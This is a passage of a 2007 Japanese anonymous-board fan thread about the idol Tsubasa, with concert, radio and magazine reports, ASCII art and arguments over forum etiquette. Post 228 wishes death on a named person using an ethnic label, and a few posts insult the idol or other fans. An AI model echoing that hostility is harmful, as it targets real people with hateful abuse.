176 :ななしじゃにー:2007/01/28(日) 21:59:22 ID:CcSglQsD
アイリッシュ「パブ」に過剰反応してしまった
パブだからっていかがわしい店ばかりじゃないのねw

177 :ななしじゃにー:2007/01/28(日) 22:14:40 ID:If1GH6y+
自分はガタイのいい陽気なオッサン達が浮かんだw

178 :ななしじゃにー:2007/01/29(月) 00:18:34 ID:oFgQXYeB
ズニア担からはスルーされてたみたいですおw

630 名前:ユーも名無しネ[sage] 投稿日:2007/01/28(日) 20:58:25
またヒッパレでズニアワラワラ出てほしいお
つも一緒でもいいからさ

179 :ななしじゃにー:2007/01/29(月) 00:22:58 ID:1Mf9kK7t
ここだお
ttp://jbbs.livedoor.jp/music/1521/

180 :ななしじゃにー:2007/01/29(月) 00:28:22 ID:zKbNDdCE
つ担てあんまりズニアに興味ないよ、残念だたねw

181 :ななしじゃにー:2007/01/29(月) 03:15:49 ID:mZJ690eL
10代後半から20代前半の一番良い時代の映像が
あまり残らなかったのは少しもったいなかったな
今更何言っても遅いけどね

182 :ななしじゃにー:2007/01/29(月) 13:54:10 ID:hZgPB3rD
今が一番良いので気にしない。



183 :ななしじゃにー:2007/01/29(月) 14:11:06 ID:qKlyS0SO
でも最近のビスはキレがないでそ
仕事しないといきなりぼーっとした感じになる
顔も酒ぶくれしてるし

184 :ななしじゃにー:2007/01/29(月) 14:20:55 ID:PQPFH73+
>182
(・∀・)人(・∀・)ナカーマ
クリコンカウコン最強

185 :ななしじゃにー:2007/01/29(月) 14:53:18 ID:zKbNDdCE
確かに露出がないほど顔がパーヤンだけとは言えない
ボッーとしまりのない顔になる

186 :ななしじゃにー:2007/01/29(月) 15:00:38 ID:qKlyS0SO
そこにイキナリ露出が入ってTVはいつもイマイチみたいな

187 :ななしじゃにー:2007/01/29(月) 15:10:19 ID:R3qcussq
ダメじゃんw
てか、10代後半〜20代前半の方が露出あった気がするが。
映像も自分はたくさんある。

188 :ななしじゃにー:2007/01/29(月) 16:53:29 ID:CYOkj04O
だな
毎週見てた希ガス

189 :ななしじゃにー:2007/01/29(月) 21:14:35 ID:wVMUA1yg
今のほうがビスグッドだよ。周りみんな言ってるから!
それに、タリンコぶりがハンパナカッタ。
当時は誰かにイジられても、イジられたことにすら気づいてないご様子で、
つにフッてあげたヤシがお気の毒なくらいだった。
今はイジられたらちゃんと「オイシイ」と認識できてるご様子なので、
見てて安心するよ。
別にお笑いの人じゃないんだから、仕切れたり、切れのあるトークなんて
不必要なんだから、男版「小倉優子チャン」狙って天然炸裂でどんどん露出
していってホスイ・・・。

190 :ななしじゃにー:2007/01/29(月) 21:22:15 ID:ugODqoDY
つは昔は素で天然って感じだったけど
今は自称天然って感じでイタイ

191 :ななしじゃにー:2007/01/29(月) 21:30:45 ID:/YSOfvGX
つ、お茶お出しして

192 :ななしじゃにー:2007/01/29(月) 21:40:40 ID:NBpqWV64
|_|
|_|∧_∧
|_|…`Д´#)  
| | o o旦~
| ̄|―u'    
""""""""""

193 :ななしじゃにー:2007/01/29(月) 21:41:13 ID:2chHvn5g
  旦~
  ∩∧_∧∧_∧旦~
 ∧ヽ∩旦_∧д´∩
(`д´ヽ∩д´) ノ
旦⊂二ミヽ ⊃旦~
  / (⌒) ノ∧_∧ミ旦
 (_)~し"⌒つд´)つ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

194 :ななしじゃにー:2007/01/29(月) 21:50:09 ID:U7bc7Fk9
>193
こぼれるぞw

195 :ななしじゃにー:2007/01/29(月) 21:54:14 ID:/YSOfvGX
>192,193
dw

196 :ななしじゃにー:2007/01/29(月) 22:03:36 ID:wVMUA1yg
25にもなって素で天然はヤバいでそ。
ある程度計算してやってくんないと。
ホンモノのヴァカじゃそろそろ笑えない年だよ?
最近結構イイセンいってると思うけど、
マジ話が無駄に長いのにオチないのとか、
大したことない知識を披露するのは
頼むからTVではやめてホシイ。
ヘラヘラ(フハハッ?)笑って時々変なこと言ったりやったり
してるくらいがカバエエし好感度いいとオモワレ。


197 :ななしじゃにー:2007/01/29(月) 22:11:21 ID:A7aWIUG2
大したことない知識をひけらかしたってこと?
つがそんなことしたことあったっけ。
まあ例えそうだとしてもあんたよりは博識だろw

198 :ななしじゃにー:2007/01/29(月) 22:12:59 ID:CYOkj04O
つ、お客ソンに例のアレ出してやれば?

199 :ななしじゃにー:2007/01/29(月) 22:19:38 ID:PQPFH73+

   / ::::|| __
 /:::::::::::|||W.C|
 |:::::::::::::::|| ̄ ̄||
 |:::::::::::::::||  ガチャッ
 |:::::::::::::::||   ||
 |:::::::::::::::||∧_∧
 |:::::::::::::::||…`д´)ドゾ
 |:::::::::::::::|| o o旦~
 |:::::::::::::::||―u' ||
 \:::::::::::||
   \ ::::||
    \||彡


200 :ななしじゃにー:2007/01/29(月) 22:20:48 ID:ORtGLoMq
ひさしぶりに見たいよアレw

201 :ななしじゃにー:2007/01/29(月) 22:22:12 ID:QhOL2bDS
   / ::::|| __
 /:::::::::::|||W.C|
 |:::::::::::::::|| ̄ ̄||
 |:::::::::::::::||  ガチャッ
 |:::::::::::::::||   ||
 |:::::::::::::::||∧_∧
 |:::::::::::::::||…`д´) <しょうがないなーサービスしといたよ
 |:::::::::::::::|| o o旦~
 |:::::::::::::::||―u' ||
 \:::::::::::||
   \ ::::||
    \||彡


202 :ななしじゃにー:2007/01/29(月) 22:25:23 ID:wVMUA1yg
お茶ありがdw
つが入れてくれたなら、なんでも飲むよ。

203 :ななしじゃにー:2007/01/29(月) 22:26:45 ID:PQPFH73+

        ∧∧ シュッ   シュッ
   ドゾー  (…`д´) シュッ  シュッ  
        (つ と彡 / シュッ
         /// /
        /c□ /
      /旦  /
     //c□ ./
   /旦 Y  /
   | |   旦 |
   |旦  ガシャーン
     ガシャーン
   ガシャーン  ガシャーン

204 :ななしじゃにー:2007/01/29(月) 22:28:30 ID:wVMUA1yg
キャーw

205 :ななしじゃにー:2007/01/29(月) 22:34:19 ID:TfpTF1zK
どうでもいいがあげるな

206 :ななしじゃにー:2007/01/29(月) 22:38:47 ID:wVMUA1yg
ゴメンネ。

207 :ななしじゃにー:2007/01/29(月) 22:41:19 ID:wVMUA1yg
AAが可愛すぎて無駄にはしゃいじゃった・・・スマソ

208 :ななしじゃにー:2007/01/29(月) 23:39:52 ID:vjr+LTPQ
193がカバエ過ぎてたまらんw

209 :ななしじゃにー:2007/01/29(月) 23:46:07 ID:C8wJdRXE
遊んでるなぁ

210 :ななしじゃにー:2007/01/29(月) 23:50:49 ID:zjqY8kvH
とりあえずwVMUA1ygが必死なのは分かった
まずはsageてカタカナ乱用と全角半角交じりも止める
(ここは半角使いが多いから)
じゃないといつまでも客扱いで誰もまともに取りあわないよ
いい加減スレの空気読むことも覚えてくれ


211 :ななしじゃにー:2007/01/30(火) 00:31:41 ID:UVtgBdUu
あー、つが見たい

212 :ななしじゃにー:2007/01/30(火) 00:49:34 ID:Mp+49qmo
必死です
それがわかってもらえたようなので
とりあえず満足です
ヲタなので、つが博識もあり、センスも抜群で
、家族思いで、真面目で、本当に素晴らしい人ってことは
もちろん分かってますが、
地方に住んでいるし、仕事上、遠征は難しいので、
ツアーで年に1回ほど生が見れるだけで、
TVでたまにしか動いてるつが見れないことが
とてもさびしいです
(しかも一般にはツレのおかげで出してもらってるって
イメージもついてるらしいし、冠番組は期待できなさそうだし)
一般の人にどうしたら受け入れられて
単独でもTVにちょくちょくでてもらえるか、
そればかり考えてしまいます
こんな私はきっと頭のおかしい人なんでしょうねw




213 :ななしじゃにー:2007/01/30(火) 01:00:20 ID:jwQWnOgo
好きなのはわかりました
あなたに壺は向いていませんのでFSにお帰り下さい

214 :ななしじゃにー:2007/01/30(火) 01:22:20 ID:Mp+49qmo
スルーして下さい

215 :ななしじゃにー:2007/01/30(火) 08:10:07 ID:XV40I0lI
新手ののりよktkrww

216 :ななしじゃにー:2007/01/30(火) 09:10:22 ID:POw9uH6I
のりよナツカシスww

217 :sage:2007/01/30(火) 12:18:21 ID:6hZGUo8z
ざわざわしてる場合じゃないぞ
行進してる(´ー`)ノ゛

218 :ななしじゃにー:2007/01/30(火) 12:22:55 ID:7BGlWbiC
泣きながらVサインw

219 :ななしじゃにー:2007/01/30(火) 12:31:20 ID:F2aOK/kk
寝ぼけながら書いた文面みたいだw
はじめは別人が打ったのかとオモたけどww

220 :ななしじゃにー:2007/01/30(火) 12:33:24 ID:tGp6p8fq
なんだこの改行と顔文字w

221 :ななしじゃにー:2007/01/30(火) 12:51:02 ID:NCCjfqcj
本当に今日の更新なんなんだwww顔文字とかwww

222 :ななしじゃにー:2007/01/30(火) 14:44:02 ID:2EhyIiC9
-_-;

223 :ななしじゃにー:2007/01/30(火) 14:53:17 ID:nGvqchRD
二度寝はしたんだなw

224 :ななしじゃにー:2007/01/30(火) 16:29:13 ID:6ci1SIxH
書き出しワロタ
つ日記は前向きで好き

最近ヲタになったんだけど
前のも読んでみたいなぁ



225 :ななしじゃにー:2007/01/30(火) 16:41:50 ID:uSt2dzlN
こういうのズニア担は興味ないお
いい加減巣に帰ってお

569 名前:ユーも名無しネ[sage] 投稿日:2007/01/30(火) 16:22:40
>548
つは座の家に行ったことあるお

226 :ななしじゃにー:2007/01/30(火) 16:43:39 ID:POw9uH6I
朝早く起きちゃって変なテンソンのつワロスw

227 :ななしじゃにー:2007/01/30(火) 20:59:20 ID:+imydaQm
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
ジャニーズドラマを語るスレ178 [テレビドラマ]
【音楽・新譜】CDチャート速報/売上議論・予想スレッド【ORICON】1/28〜vol.2 [芸能音楽速報]
新ドラマ予想・ジャニーズ関連専用スレ [テレビドラマ]
SHOCK2007 -2- [演劇・舞台役者]
【ユノア】荒木元太郎もの限定パート38【ユノラ】 [お人形]

228 :ななしじゃにー:2007/01/30(火) 21:57:34 ID:hxidapJ8
そのタケイシケイスケって中国人こそ死ぬべき

229 :ななしじゃにー:2007/01/30(火) 22:22:56 ID:ubOATJfh
PV集のオフショ、チャンネル@で公開したものとダブリじゃないよな?
高くてもオフショが充実してたら元とった気分になるんだけど

230 :ななしじゃにー:2007/01/30(火) 22:57:40 ID:UVtgBdUu
アルマム特典考えるとありえるよな
でも1種だからいつもみたいに複数買いしなくて助かるw
ゲダンもキレイに残せるな

231 :ななしじゃにー:2007/01/31(水) 13:00:28 ID:hevAzBSH
13 :名無しさん@恐縮です :2007/01/30(火) 07:36:37 ID:CvO7upbZ0
またもや &糞 の方は出番ナシwwwwwwww

232 :ななしじゃにー:2007/01/31(水) 17:46:07 ID:JHXZERA3
個人的にはセレネイ、お面wのチャンネル@の時がツボだったので
その回の未公開があったら収録してほしい

233 :ななしじゃにー:2007/01/31(水) 19:25:30 ID:ctqY0VRa
振りつきが売りなら教育テレビのお兄さんやってくれないかなぁ

234 :ななしじゃにー:2007/01/31(水) 19:38:03 ID:sE+vejvn
ド真面目に教える姿が浮かぶ…

235 :ななしじゃにー:2007/01/31(水) 19:54:02 ID:sVO+TC2o
ツアーではツバチェ見れるかねぇ

236 :ななしじゃにー:2007/01/31(水) 20:01:49 ID:Xz7mA18Y
み〜ぎう〜えとか
やってホスィ

237 :ななしじゃにー:2007/01/31(水) 20:52:24 ID:Me7L8dkv
LTとMLSがもう一度見たい

238 :ななしじゃにー:2007/01/31(水) 20:54:33 ID:e10TBHvo
つが踊るプシュマイウェイも見たい

239 :ななしじゃにー:2007/01/31(水) 20:57:59 ID:mDWAiR4d
少クラの女王RつVer.はメチャクチャかっこ良かった

240 :ななしじゃにー:2007/02/01(木) 01:03:24 ID:RuKi9vQP
禿同(゚∀゚)
その頃ヲタじゃなかった自分はちゅーぶで
うpされてた時子踊りしたぞ。

241 :ななしじゃにー:2007/02/01(木) 16:29:54 ID:kLda4GYF
壷不安定だね

242 :ななしじゃにー:2007/02/01(木) 21:36:27 ID:QA7i8H14
(…`д´) ラジヲ忘れないでね

243 :ななしじゃにー:2007/02/01(木) 23:36:19 ID:mDBftWVw
タッキー&糞

244 :ななしじゃにー:2007/02/02(金) 00:46:58 ID:N3W1C1D7
ラジオ禿タノシカタ
天龍を知らなかったのでググッてみたら・・・wwwww

245 :ななしじゃにー:2007/02/02(金) 00:57:27 ID:FVu0pafW
そんなラジオを聞き逃したorz
姐さん方、レポ頼めんかのう。

246 :ななしじゃにー:2007/02/02(金) 01:01:22 ID:wA5WD4m3
だめはじめて聞いた
ピンクレディみたいだね

247 :ななしじゃにー:2007/02/02(金) 14:01:10 ID:E250pUYF
さっき日テレにレボ兄さん出てたが
幼少時代の写真が、まるでつみたいでびびった

248 :ななしじゃにー:2007/02/02(金) 16:50:32 ID:WQW0s9Q3
似てるよね

249 :ななしじゃにー:2007/02/02(金) 18:22:35 ID:cyOfHKaX
結局美談載ってないのか
パラパラ見たがつがクルクルパーマにしたら…
って心配になったw

250 :ななしじゃにー:2007/02/02(金) 18:28:56 ID:oAjPhETw
>249
美談は最後の方にかすかにコンレポあったよ
クルクルパーマは自分もちょとオモタw

251 :ななしじゃにー:2007/02/02(金) 21:00:49 ID:CV5u6QeC
素敵ジャマイカ、と言ってみるレス
特急紺のビデオの頃なら可愛いけど、ゴッツクなった今はどうだろうw

252 :ななしじゃにー:2007/02/02(金) 21:27:01 ID:tGBVhZg0
髪よりパーヤソ度がキニナル

253 :ななしじゃにー:2007/02/02(金) 22:38:20 ID:cyOfHKaX
>250
もいっかい見てみるd!

254 :ななしじゃにー:2007/02/03(土) 07:13:31 ID:Utv9idHP
つは雑誌ビダンを愛読してるせいで、「びなん」と読めなかったのかしら?

255 :ななしじゃにー:2007/02/03(土) 14:49:41 ID:v20NoCuL
つ担基地とうとう規制されたんだw

256 :ななしじゃにー:2007/02/03(土) 15:17:44 ID:3hG5FqYf
つに迷惑かける
あんなヤシは
つ担じゃないから

257 :ななしじゃにー:2007/02/03(土) 21:14:55 ID:CFGYZwBf
>254
ワロスw
ジヌンは雑誌ビダンののことを言ってるのかとオモてた

258 :ななしじゃにー:2007/02/04(日) 00:11:46 ID:qErshObI
虜なのか…レイニー歌って欲スィ

259 :ななしじゃにー:2007/02/04(日) 02:27:17 ID:oOT0Qu++
今日のレポ
セレネイの時ステッキの調子が悪かったのか
金のステッキを派手に蹴り飛ばしたつに萌え

260 :ななしじゃにー:2007/02/04(日) 02:34:18 ID:+kF37xT0
>259
萌えd
魂だとS度が増すなw

261 :ななしじゃにー:2007/02/04(日) 02:34:57 ID:NnkAuO2k
d
髪型はどうだった?

262 :ななしじゃにー:2007/02/04(日) 09:24:21 ID:hXT8hnY4
魂最中に瞬間的なイラつを発見するのもオツなもんだw

263 :ななしじゃにー:2007/02/04(日) 09:37:26 ID:zntGcqM9
小さい子にデコチューもあったらしいし大胆になってきたなw

264 :ななしじゃにー:2007/02/04(日) 09:53:28 ID:VQxIM2V+
ステッキ蹴り見たかった
聞いただけでモエw

265 :ななしじゃにー:2007/02/04(日) 10:04:08 ID:VQxIM2V+
サゲ間違いスマソ
蹴られて逝きます

266 :ななしじゃにー:2007/02/04(日) 10:20:11 ID:oOT0Qu++
髪型は前髪が伸びたなーという印象
でも今回のバージョンのスレイヴには今の髪型が最強
十六夜を彷彿とさせテラヤバス

267 :ななしじゃにー:2007/02/05(月) 00:35:29 ID:TjpiOEuv
自分の萌えポインツはコール合戦の生声での煽りと
着替コーナーで着替終わった後衣装のパンツの上げすぎをなおしてパンツチラ見えw
ケイタイからスマン

268 :ななしじゃにー:2007/02/05(月) 00:43:37 ID:L/w25Wax
d
パンツ上げすぎw

269 :ななしじゃにー:2007/02/05(月) 15:08:34 ID:KBBfB7U+
とりあえず最悪のハプニングさえ笑いのネタにしてしまうつにはそうとうのSっ気を感じたw

270 :ななしじゃにー:2007/02/05(月) 16:00:17 ID:J4ui0RSd
でも微妙なふいんきにニガワラしてたつも
係員に取り押さえられてる間マジ顔(口がオ-の形のまま)で固まってたぞ
その後「仕込みですから」とフォロ-したのはつだったか?

271 :ななしじゃにー:2007/02/05(月) 16:35:38 ID:clRuqhmh
>270
不謹慎だが見たかったなぁw

272 :ななしじゃにー:2007/02/05(月) 16:37:38 ID:BMGbIgMq
さすが基地仲間だな

273 :ななしじゃにー:2007/02/05(月) 17:46:15 ID:6tfeOmo/
つが寝転んで触らせてたのってつ魂でもなかったっけ?
デジャブ?

274 :ななしじゃにー:2007/02/05(月) 18:22:52 ID:IKG3LwZy
>>269
私はその一言でやっとテンション取り戻せましたよ

275 :ななしじゃにー:2007/02/05(月) 18:29:22 ID:bd4paQNM
>270
ツレ

276 :ななしじゃにー:2007/02/05(月) 18:30:12 ID:gy074k04
>273
やってた

277 :ななしじゃにー:2007/02/05(月) 18:31:41 ID:gy074k04
上げちゃったorz
逝ってくる…

278 :ななしじゃにー:2007/02/05(月) 18:54:10 ID:aN9G27jU
そろそろだな
地雷に注意だw

279 :ななしじゃにー:2007/02/05(月) 20:03:06 ID:l6dLV5v2
つってば罪な男w

280 :ななしじゃにー:2007/02/05(月) 20:39:16 ID:fdGSs0Oa
テレビデテ

281 :ななしじゃにー:2007/02/05(月) 21:33:55 ID:4LImeMH5
林檎女をネタにするアホなつ
タレもタレならオタもオタだな


282 :ななしじゃにー:2007/02/05(月) 22:22:54 ID:FGKz70no
つ、準備OK?

283 :ななしじゃにー:2007/02/05(月) 22:24:59 ID:Umsk1Qux
⊂(`д´⊂⌒`つ≡≡≡(´⌒

284 :ななしじゃにー:2007/02/05(月) 22:33:54 ID:g5n73o8i
>283
オメ!

285 :ななしじゃにー:2007/02/05(月) 22:35:00 ID:vYWnFBxQ
>283
つオメw

286 :ななしじゃにー:2007/02/05(月) 22:42:10 ID:Umsk1Qux
(;…`д´)チョットアセッタ

287 :ななしじゃにー:2007/02/05(月) 23:24:30 ID:ZM8vSwBG
>286
最近スレまわり遅いから気を付けろよw
オメ!

288 :ななしじゃにー:2007/02/05(月) 23:58:37 ID:7l0yGleA
さすがにママドオルはわかったのかな


289 :ななしじゃにー:2007/02/06(火) 06:53:23 ID:X2zVccoF
リスナーがメールしたんじゃね?
しかしママドールにあんなに食いつくとは思わなんだw

290 :ななしじゃにー:2007/02/06(火) 15:56:22 ID:suwB61qb
ママドオルってなに?

291 :ななしじゃにー:2007/02/06(火) 16:06:26 ID:VVZE7izr
ままどおる
ttp://www.chuokai-fukushima.or.jp/ksk/mamador/seihin.html

292 :ななしじゃにー:2007/02/06(火) 16:19:20 ID:suwB61qb
>291
d
お菓子だったんだ!
母から子へ受け継がれるやさしい味わい…。

なんだか美味しそうw

293 :ななしじゃにー:2007/02/06(火) 22:30:37 ID:ajDfsT03
3誌買った
前髪が多少鬱陶しいが髭ナシビズ(・∀・)イイ!!
平安と組んで踊りたいって…それ禿見てえええええ

294 :ななしじゃにー:2007/02/06(火) 23:03:31 ID:cxBnjpK8
幻となったWSS騒動を思い出したw
本当に実現したらいいな!

295 :ななしじゃにー:2007/02/07(水) 00:35:01 ID:iTkj0v5A
平安はつが骨折したの隠しながらがんがってた魂で
寝てた人だから組まなくていいよ

296 :ななしじゃにー:2007/02/07(水) 01:02:19 ID:wEcv0zAP
こういう人もいるので、他タレの名前は極力出さないのがよろし

昔はこんなじゃ無かったんだけどね
余裕ないヤシ大杉

297 :ななしじゃにー:2007/02/07(水) 07:08:35 ID:FDShwrJ6
昼の紺に来てくれたわけだし寝てても責める気にはならないけどねw
新しいことをしてくれるならウレシス

298 :ななしじゃにー:2007/02/07(水) 10:00:49 ID:eT34xz9N
蛇兄感謝祭では平安と踊ったことなかったっけ?

299 :ななしじゃにー:2007/02/07(水) 13:44:57 ID:bQkvQcSV
感謝祭DVD1回見ただけでぜんぜんリピってないけど
そんな事もあったよーな

300 :ななしじゃにー:2007/02/07(水) 13:51:56 ID:TnAJHLjd
>293
姐さん、1番美味しいのはどれ?

301 :ななしじゃにー:2007/02/07(水) 19:23:37 ID:9MKwBFCV
293じゃないがW誌がイイとオモ

302 :ななしじゃにー:2007/02/07(水) 21:39:00 ID:1dHACI1S
さすが林檎女の仲間らしい気持ち悪いスレですね

303 :ななしじゃにー:2007/02/08(木) 01:04:58 ID:L6rAuiXW
>300
自分も293じゃないがW誌イイとオモ
髪型がステチだ(*´∀`)
でも今月3誌はどれもビズイイよ

304 :ななしじゃにー:2007/02/08(木) 01:19:45 ID:WLHoBNOb
今更293だが自分はP誌が好きw
W誌は26pの9カットがそれぞれに萌える

305 :ななしじゃにー:2007/02/08(木) 01:34:32 ID:t7hXfttJ
>301>303>304
姐さん方dクス!
明日買ってくるノシ

306 :ななしじゃにー:2007/02/08(木) 12:41:04 ID:x6KqZfkW
仕事無いからって他Gタレに寄生しようとするなよ
舞台の主役も出来ない雑魚と雑魚担ウザス

307 :ななしじゃにー:2007/02/08(木) 13:35:33 ID:zVTt7D+N
なるともで千原Jr.がつの事話してたね

308 :ななしじゃにー:2007/02/08(木) 14:03:30 ID:aSwSAGuX
>307
どんな話?

309 :ななしじゃにー:2007/02/08(木) 15:11:08 ID:aSwSAGuX
事故解決。
誉められたのはいいが、コーヒーって所がつだなw

310 :ななしじゃにー:2007/02/08(木) 15:33:39 ID:aSwSAGuX
×事故
○自己

311 :ななしじゃにー:2007/02/08(木) 17:57:56 ID:EJOsMjN/
(…`д´)<ラジオ忘れないでね☆

312 :ななしじゃにー:2007/02/08(木) 19:53:03 ID:corfqWh4
>(…`д´)
毎週教えてくれてありがd豚d

313 :ななしじゃにー:2007/02/08(木) 21:13:22 ID:L6rAuiXW
>(…`д´)
今週もゼヒ暴走してくれw

314 :ななしじゃにー:2007/02/08(木) 22:14:40 ID:/2NqmMOr
>(…`д´)
ついでに283も行進して栗w

315 :ななしじゃにー:2007/02/08(木) 23:17:33 ID:wQRHjWEj
公式に新曲のソロ曲レコーディングとあったけど何になるんだろう
まったく知らないのもいいな

316 :ななしじゃにー:2007/02/08(木) 23:18:35 ID:n/5m4RWu
新曲シングルのソロ何入れるんだろ
自分的希望は2顔なんだが、ズニア時代のは無理かな

317 :ななしじゃにー:2007/02/08(木) 23:20:22 ID:n/5m4RWu
リロってなくてスマソ
同じネタだったねw

318 :ななしじゃにー:2007/02/08(木) 23:20:52 ID:wQRHjWEj
>316
自分としてはアクセルも聴きたいけど、発売前にどんな曲だろう
という楽しみも欲しいw

319 :ななしじゃにー:2007/02/08(木) 23:48:40 ID:/2NqmMOr
自作曲入れてきたらそれはそれでウレシス

320 :ななしじゃにー:2007/02/08(木) 23:51:33 ID:n/5m4RWu
そういや今年とんがりどうなるんかな
続投なら新曲もアリだろうね

321 :ななしじゃにー:2007/02/09(金) 16:40:23 ID:k5g0+R0s


            ┌────―┐.
             || ̄ ̄ ̄ ̄ ̄.||
             ||  ////.||
          ♪ || ♪   今日も男の中の男♪
           ♪ ∧_∧  ∧_∧ ||.
            ♪(   ∩ (`д´∩||.
            .ノ   ノ 丶   . ||
           (  ノ ̄ ̄ ̄ ̄ ̄|
           ∪∪_____.|

322 :ななしじゃにー:2007/02/09(金) 19:15:29 ID:lelpSmHa
出てこいや!

323 :ななしじゃにー:2007/02/09(金) 21:09:15 ID:IG/LHPUC
今井サン!!>(´∀`‥)

324 :ななしじゃにー:2007/02/09(金) 21:14:19 ID:bRO7lBcQ
>323
たすかに愉快だったけどここは個人スレなんでそこんとこヨロ

つ、前髪ちょっとは切ったかな


325 :ななしじゃにー:2007/02/09(金) 21:18:09 ID:IG/LHPUC
スマソ
つい声かけたくなっちマタorz

326 :ななしじゃにー:2007/02/09(金) 21:22:19 ID:eOOJ7aQw
>321-322
それ誰だっけ?猪木?

327 :ななしじゃにー:2007/02/09(金) 21:25:17 ID:3f8JmNNQ
>325
ドンマイ

明日明後日と寒い地方だから風邪引くなよつ

328 :ななしじゃにー:2007/02/09(金) 21:33:53 ID:Mrlvx9A+
高田統括本部長です

329 :ななしじゃにー:2007/02/09(金) 23:12:37 ID:m/I4/Nzc
何?この気持ち悪い流れ

330 :ななしじゃにー:2007/02/10(土) 10:56:29 ID:ikTs3qqh
すぐ反応するくらい意識してんのもどうかと

331 :ななしじゃにー:2007/02/10(土) 14:36:12 ID:A7u48djR
ツアコンの曲でつがライオンみたいなぬいぐるみを
手にはめてるのは何の曲の時なのかな

332 :ななしじゃにー:2007/02/10(土) 14:42:18 ID:LNgl3iRg
>331
ツアコン?

333 :ななしじゃにー:2007/02/10(土) 17:04:38 ID:gJnmD3Ew
>331
狂虹
禿カバエエよ

334 :ななしじゃにー:2007/02/10(土) 17:48:51 ID:UWvxKC0Z
ttp://jbbs.livedoor.jp/bbs/read.cgi/music/17186/1164384973/

こそこそツレ叩いてないで堂々とやれば?
さすが卑怯者の基地の集まり

335 :ななしじゃにー:2007/02/10(土) 18:00:02 ID:dWvhM8aO
魂スレにつ作雪だるまうpされてたね
作ってるつが見たいw

336 :ななしじゃにー:2007/02/10(土) 18:00:42 ID:5tDhcqUv
つ作の雪ダルマカバエエよ

337 :ななしじゃにー:2007/02/10(土) 19:19:51 ID:1/1ds9PL
雪ダルマ北の国でも作ってほしかったw

338 :ななしじゃにー:2007/02/10(土) 19:53:58 ID:XdpRsDMW
雪ダルマのブサカワ加減がつだなぁって思うよw

339 :ななしじゃにー:2007/02/10(土) 20:02:57 ID:e3htz/gZ
>331
今日はかえるのぬいぐるみに丁寧に衣装のベスト着せててカワ○スw

340 :ななしじゃにー:2007/02/10(土) 23:16:10 ID:4Sdumzni
(…`д´)<最近のテーマは「東京アウトサイダー」なので、そこんとこよろしく!!

341 :ななしじゃにー:2007/02/10(土) 23:21:43 ID:A7u48djR
>333
d
>339
d  かえる禿ミタスw

342 :ななしじゃにー:2007/02/11(日) 18:47:10 ID:GYnpak7k
更新まだぁ〜?

343 :ななしじゃにー:2007/02/11(日) 21:48:58 ID:isAGSjJD
まだ

344 :ななしじゃにー:2007/02/11(日) 22:08:00 ID:CMxdT3m/
行進しろやゴラァ

345 :ななしじゃにー:2007/02/12(月) 00:53:44 ID:dz6KhLk/
つのトシチャンが歌うマッチのハイティーンブギにテラワロタ
最近ものまね良くするね

346 :ななしじゃにー:2007/02/12(月) 00:54:06 ID:WdFAD3gy
波の写真ってまだ届いてないよね?

347 :ななしじゃにー:2007/02/12(月) 02:04:21 ID:7UI6g2wT
>345
自分は、つが「次の公演から短髪にします」
と言った瞬間起こった大ブーイングにワロタよw

>346
まだ

348 :ななしじゃにー:2007/02/12(月) 06:55:52 ID:2YGC9d7Z
>347
短髪の時は(ヲタに)素晴らしいリアクションを戴きまして…にもワロタよ
短い方がいい人?に結構拍手がありご満悦だったが
イヤ、デモキタノクニハショウゲキダ(ry

349 :ななしじゃにー:2007/02/12(月) 08:28:03 ID:RsXGkJ+l
ドSつ全開だた

350 :ななしじゃにー:2007/02/12(月) 08:46:44 ID:26t4Pf/t
短髪発言、ホントにあったの?
美茄子からヲタになったものとしては嬉しい限りだわ
今のワイルドな感じの長髪も隙だけどさ

351 :ななしじゃにー:2007/02/12(月) 10:06:16 ID:rEN82PYa
さすが東京アウトサイダーw
ヘアスタイルやりつくしたと言うわりには変化の激しい男だな

352 :ななしじゃにー:2007/02/12(月) 10:49:55 ID:eVm6hcXI
>351
つって、いつ見ても私服のどこかにTOKYO OUTSIDERって書いてあるよなw

353 :ななしじゃにー:2007/02/12(月) 12:00:53 ID:lAJ0l3HW
>352
組長リスペクトのつだし仕方茄子w

354 :ななしじゃにー:2007/02/12(月) 13:14:57 ID:7UI6g2wT
>350
言ってたけど冗談だとオモ。

355 :ななしじゃにー:2007/02/12(月) 13:21:09 ID:dz6KhLk/
安心しる、次の場所では切らないって言ってたからw
でも2部の途中でまた前髪耳にかけちゃって
ピッチリ七三になってたよwちょっと切って欲しいな

356 :ななしじゃにー:2007/02/12(月) 14:08:14 ID:YoVhjJ8c
BABBIのチョコ
http://www.babbi.jp/chocolate.html

357 :ななしじゃにー:2007/02/12(月) 14:44:10 ID:aOYV+0Na
いい加減ナリやめろやうぜえ

65 名前:ユーも名無しネ[sage] 投稿日:2007/02/12(月) 13:39:13
ちょ、滝つアルマムにスレイブ入ってるの知らなかったおおおおおおおお
さっさと聞いておけばよかったおおおおおおおおおおお

242 名前:ユーも名無しネ[sage] 投稿日:2007/02/12(月) 14:01:01
レイニーメモリーズ?とかいうのが名曲すぎてからいおおおおおおおおお

358 :ななしじゃにー:2007/02/12(月) 15:03:41 ID:dz6KhLk/
FMレポ待ち

359 :ななしじゃにー:2007/02/12(月) 15:26:07 ID:2YGC9d7Z
黒ブチメガネ白シャツに黒ベスト?(ガラス越しでよく見えず)
(普段はどんな音楽を聴くか?の話から)
U2コンサ-トは3日チケを取ったが1日は仕事で行けず2日行った
パ-ソナリティの男性も好きで見に行ったらしく
ボノに会った話で羨ましがられてた


360 :ななしじゃにー:2007/02/12(月) 15:34:36 ID:1SBd0bdG
トントン!
メガネつ裏山

361 :ななしじゃにー:2007/02/12(月) 17:58:26 ID:hazVKAhf
バンデスさっき終わりまつた
ラジオと同じ服装?で結構お疲れモードでした
・ちっちゃい頃の誕生日にはプラスチックのバッティングマシーンをもらった
・ホッサマのPVは2日間撮りだったため肌の色が違くなっていた

とか言ってましたw

362 :ななしじゃにー:2007/02/12(月) 19:13:48 ID:7UI6g2wT
牛舌番組レポです
番組自体は19時までだけど出演は最初の30分程
デカ盛りメニュー特集を見て、3人前ラーメンは完食出来そう
1.8リットルパフェには「すごいカロリー…強烈ですねぇ」

視聴者からの質問(おばさんファンをどう思うか?
紺でつに無視されてる様に感じる)には、誤解ですのでご安心をとw
いくつになっても心にハリのある女性は素敵だなと言ってました

363 :ななしじゃにー:2007/02/12(月) 19:15:29 ID:7UI6g2wT
一応牛舌番組レポします
番組自体は19時までだけど出演は最初の30分程
